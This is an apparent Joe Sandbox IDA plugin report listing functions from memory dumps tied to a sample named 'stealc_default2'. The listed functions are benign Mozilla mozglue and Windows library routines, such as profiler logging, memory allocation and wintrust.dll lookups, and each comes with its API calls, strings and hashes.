Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: 77bb476ae9efa730fa4c9380ccde76d328d378bbd2b5a7721edf8ecf6e56aab3
Instruction ID: 780131bfaf4f8542482b64a591b212fb6dd16f1630b7df647781d9edc65710e7
Opcode Fuzzy Hash: 77bb476ae9efa730fa4c9380ccde76d328d378bbd2b5a7721edf8ecf6e56aab3
Instruction Fuzzy Hash: 481129B3E042555BEB008A78AC4976F7AA89B51B19F040475E885D7350E379C81487E3

Function 6BFA0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BFA0270
GetCurrentThreadId.KERNEL32 ref: 6BFA02E9
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BFA02F6
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BFA033A

Strings

about:blank, xrefs: 6BFA020F

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: b329bc532efb1630b0eb17e5e46bb49cd6d5dd9326541681a8fc179a18a4e927
Instruction ID: 008bc063b233a185c172658bb28f64894c047744ead1466636e4855b16c486a2
Opcode Fuzzy Hash: b329bc532efb1630b0eb17e5e46bb49cd6d5dd9326541681a8fc179a18a4e927
Instruction Fuzzy Hash: 2051BC76A0021ACFCB04DF78D880AAAB7F1FF89324F644559C819A7361D775F946CBA0

Function 6BF9E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF9E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BF9E084,00000000), ref: 6BF9E137

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BF9E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BF9E1E9

Part of subcall function 6BF999A0: GetCurrentThreadId.KERNEL32 ref: 6BF999C1
Part of subcall function 6BF999A0: AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF999CE
Part of subcall function 6BF999A0: ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF999F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6BF9E13F

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 49ff4af85977d8e3cf0b3fdd0169370d0e519e03a84c421dcbfde39f3a6f19fb
Instruction ID: 5d24515bf3405741d7701c9eb0e760f85509766c74a353abc2e181579cfddbb9
Opcode Fuzzy Hash: 49ff4af85977d8e3cf0b3fdd0169370d0e519e03a84c421dcbfde39f3a6f19fb
Instruction Fuzzy Hash: 38312A73A443025FD700AF68944136FF7E6AFC9748F14882DE8544B261EB79C948C793

Function 6BF90210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6BF90222
moz_xmalloc.MOZGLUE(0000000C), ref: 6BF90231

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BF9028B
RtlFreeHeap.NTDLL ref: 6BF902F7

Strings

@, xrefs: 6BF902D8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 0a29a9719f307ccb87ee585e124f8a478127b0d2e0af3bcc87d684e92de8a192
Instruction ID: 353261edc7d863305ac793308afade26d1509f76fe06091e938dc0fdb6321054
Opcode Fuzzy Hash: 0a29a9719f307ccb87ee585e124f8a478127b0d2e0af3bcc87d684e92de8a192
Instruction Fuzzy Hash: 8331EDB3A002118FEB54DF28D880B1AB7E2FF44710B14896DD95ADB760E3B5EC01CB90

Function 6BFBAB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6BF7BFBD,.dll,00000000,00000000,00000000,6BF7BFBD), ref: 6BFBABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6BFBABD8

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BFBABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BFBAC03

Strings

.dll, xrefs: 6BFBABB4, 6BFBABFA

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: 006868a4d7152f2c72bd8cb5f26509237a9a74493fbaf96500fe12469f03a693
Instruction ID: 2351ba82f982b24d60147159ad2ab8f9cd54c2157c3263ee8281f902f3e50328
Opcode Fuzzy Hash: 006868a4d7152f2c72bd8cb5f26509237a9a74493fbaf96500fe12469f03a693
Instruction Fuzzy Hash: F10192B3A0011A6FEB015F758C45BBFB6ADEB85250F050439FD04D3620E77A9D5487B1

Function 6BF5F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6BF5EE51,?), ref: 6BF5F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6BF5F0C2

Strings

Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6BF5F0DC
Could not find CoTaskMemFree, xrefs: 6BF5F0E3
ole32, xrefs: 6BF5F0AD

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 80ef8fbb006728f6e8435a98c22bd889011a71e0d48ed94529e087985484dc38
Instruction ID: cefebfe84ed6668287563eb706f244615c327b5bf1df7ff4b9300ddc822fd957
Opcode Fuzzy Hash: 80ef8fbb006728f6e8435a98c22bd889011a71e0d48ed94529e087985484dc38
Instruction Fuzzy Hash: B3E0D8735543019BEF441E7A9819B2637995B6270630C406DE602C1A70EE3ED124C631

Function 6BFB73E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6BF6434E), ref: 6BFB73EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BFB7404
FreeLibrary.KERNEL32(?,?,6BF6434E), ref: 6BFB7413

Strings

SetProcessDpiAwarenessContext, xrefs: 6BFB73FE
user32.dll, xrefs: 6BFB73E6

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: 73d421b25dc7a9e4e757e75ee05c8ac1d85016a42a5105453cd351f3fd8b3e1b
Instruction ID: b224b930d1d1e60ef4783a22d25da4c95f5a6944a4710f24912d06870f75dec7
Opcode Fuzzy Hash: 73d421b25dc7a9e4e757e75ee05c8ac1d85016a42a5105453cd351f3fd8b3e1b
Instruction Fuzzy Hash: 00E04F71501302DBE7102FA5C808702FFECEB05642F008C2EEA85C3731EBB5D8048B50

Function 6BF901C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF67266), ref: 6BF901C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BF901E7
FreeLibrary.KERNEL32(?,6BF67266), ref: 6BF901FE

Strings

wintrust.dll, xrefs: 6BF901C3
CryptCATAdminReleaseContext, xrefs: 6BF901E1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 5e873a6eb8a937762507797d07fd904ef7518a3c6e682533c6429e3f08aeee8f
Instruction ID: 20a12406bc698523128126dbc1e40c03f1aa234f2b4c008e5a44cb8647c8c83f
Opcode Fuzzy Hash: 5e873a6eb8a937762507797d07fd904ef7518a3c6e682533c6429e3f08aeee8f
Instruction Fuzzy Hash: 32E09A765A03859FEF806F769808B027BE8AB87741F004429EA05C2271DBBAC04CDB12

Function 6BF90170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF67308), ref: 6BF90178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6BF90197
FreeLibrary.KERNEL32(?,6BF67308), ref: 6BF901AE

Strings

wintrust.dll, xrefs: 6BF90173
CryptCATCatalogInfoFromContext, xrefs: 6BF90191

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: cbf7e4ac5159e9019dab0621641f93e62a112fb51734a3acfea471543ca1be05
Instruction ID: 8d83a4e604c84044d5a099caa2c72fa1ec72f4faba9187e2e5d7732b0894a721
Opcode Fuzzy Hash: cbf7e4ac5159e9019dab0621641f93e62a112fb51734a3acfea471543ca1be05
Instruction Fuzzy Hash: 23E09A765A02059BFFC06F75D908F0A7BE8B786741F04447BE98482371DBB9C088DB22

Function 6BF90120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF67297), ref: 6BF90128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BF90147
FreeLibrary.KERNEL32(?,6BF67297), ref: 6BF9015E

Strings

wintrust.dll, xrefs: 6BF90123
CryptCATAdminEnumCatalogFromHash, xrefs: 6BF90141

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 1758c8fe3e4590108fabccabcb41a3b19f503fa2e286d6fc292127e6158245fc
Instruction ID: 73c44f2757c07061ab0c837c03e6bda37120db50590ad389c370319a1b2c3535
Opcode Fuzzy Hash: 1758c8fe3e4590108fabccabcb41a3b19f503fa2e286d6fc292127e6158245fc
Instruction Fuzzy Hash: 57E01A721252449BFF406F39D808B023BE8A783701F00442AA904C3330DBBAC048CB12

Function 6BF900D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF67235), ref: 6BF900D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6BF900F7
FreeLibrary.KERNEL32(?,6BF67235), ref: 6BF9010E

Strings

wintrust.dll, xrefs: 6BF900D3
CryptCATAdminCalcHashFromFileHandle2, xrefs: 6BF900F1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 23e711e42702993e301efe2b96f12dbad7c1f1c8e220fee27f4a25fc0fee4eeb
Instruction ID: be5698beb94e7f5df1a6ebb322c39cd7190e12be826a9a08307350451568d4c6
Opcode Fuzzy Hash: 23e711e42702993e301efe2b96f12dbad7c1f1c8e220fee27f4a25fc0fee4eeb
Instruction Fuzzy Hash: 56E04F722603059BFF406F35D909B213BF8A783702F048439A94882230DBB9C148CB16

Function 6BFBBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6BF605BC), ref: 6BFBBAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BFBBAD7
FreeLibrary.KERNEL32(?,6BF605BC), ref: 6BFBBAEC

Strings

kernelbase.dll, xrefs: 6BFBBAB3
VirtualAlloc2, xrefs: 6BFBBAD1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 7fe2d744413642a844499eda3434f72faac861f91578c16f87308687f0f43f83
Instruction ID: 4550ad9696f298635bc20ddc7bb8cf6a5495bd0522692c60038132115ac6e4e9
Opcode Fuzzy Hash: 7fe2d744413642a844499eda3434f72faac861f91578c16f87308687f0f43f83
Instruction Fuzzy Hash: 6EE0BF715203419BDF415F72C958B057BE8E786305F14442DA904C2332EBB9C10C8B22

Function 6BFBC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF677C5), ref: 6BFBC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BFBC2B7
FreeLibrary.KERNEL32(?,6BF677C5), ref: 6BFBC2CC

Strings

wintrust.dll, xrefs: 6BFBC293
CryptCATAdminCalcHashFromFileHandle, xrefs: 6BFBC2B1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 6234afb22563a152808e7d409661791eb679f11d634760dc13ffb49ab391c1e3
Instruction ID: f945959e97e728369d7e59950028710012444d90dc238fbce949f76faca82af4
Opcode Fuzzy Hash: 6234afb22563a152808e7d409661791eb679f11d634760dc13ffb49ab391c1e3
Instruction Fuzzy Hash: 50E0B6756623019FEF406F7AC908B037FE8FB86205F480439E90482731EBBAC008CB62

Function 6BFBC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BF677F6), ref: 6BFBC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BFBC267
FreeLibrary.KERNEL32(?,6BF677F6), ref: 6BFBC27C

Strings

wintrust.dll, xrefs: 6BFBC243
CryptCATAdminAcquireContext, xrefs: 6BFBC261

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: b62549ed22020efadbd1e4c62b4d21ff1194fca8750274bde7a01cd9069db8ec
Instruction ID: c47225480a11280a43fda411d9f7c1d089429590630ee4a4559f31084e9e529c
Opcode Fuzzy Hash: b62549ed22020efadbd1e4c62b4d21ff1194fca8750274bde7a01cd9069db8ec
Instruction Fuzzy Hash: 17E09A755302019BDF846F769808B027AE8A78B305F104469E904C3371DB75C0489B52

Function 6BFBC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BFBC1DE,?,00000000,?,00000000,?,6BF6779F), ref: 6BFBC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BFBC217
FreeLibrary.KERNEL32(?,6BFBC1DE,?,00000000,?,00000000,?,6BF6779F), ref: 6BFBC22C

Strings

wintrust.dll, xrefs: 6BFBC1F3
WinVerifyTrust, xrefs: 6BFBC211

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 3ece713ed050b0415b9f59e0aa5b527d00db58470e35464b0d08d0c9da91be5b
Instruction ID: fd0ba97780589c36458c2734b9a211ba7b202d632319dc23da1ddfc3536c0d8c
Opcode Fuzzy Hash: 3ece713ed050b0415b9f59e0aa5b527d00db58470e35464b0d08d0c9da91be5b
Instruction Fuzzy Hash: 79E092756203819FEB806F768D08B027EE8AB86205F040569E90483736EBB9C00C8B52

Function 6BF660E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BF660F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BF66180
free.MOZGLUE(?,?,?,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF66211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BF66229
free.MOZGLUE(?,?,?,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF6625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6BF65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF66271

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 23bb81e684763a557087e5216b1c9b317ce05b0709ded46ce9beef5a42fc4029
Instruction ID: b2623abe02e8157125a5c5bf67ef2a2618c02530ccb0aa31ed527e38e7b9dabd
Opcode Fuzzy Hash: 23bb81e684763a557087e5216b1c9b317ce05b0709ded46ce9beef5a42fc4029
Instruction Fuzzy Hash: 97517BB2A002069FEB14CF68D8807AEB7B5EF45788F100439EA16D7361F739A958CB51

Function 6BF9D210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BF65820,?), ref: 6BF9D21F
moz_xmalloc.MOZGLUE(00000001,?,?,6BF65820,?), ref: 6BF9D22E

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BF65820,?), ref: 6BF9D242
free.MOZGLUE(00000000,?,?,?,?,?,?,6BF65820,?), ref: 6BF9D253

Part of subcall function 6BF75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BF75EDB
Part of subcall function 6BF75E90: memset.VCRUNTIME140(6BFB7765,000000E5,55CCCCCC), ref: 6BF75F27
Part of subcall function 6BF75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BF75FB2

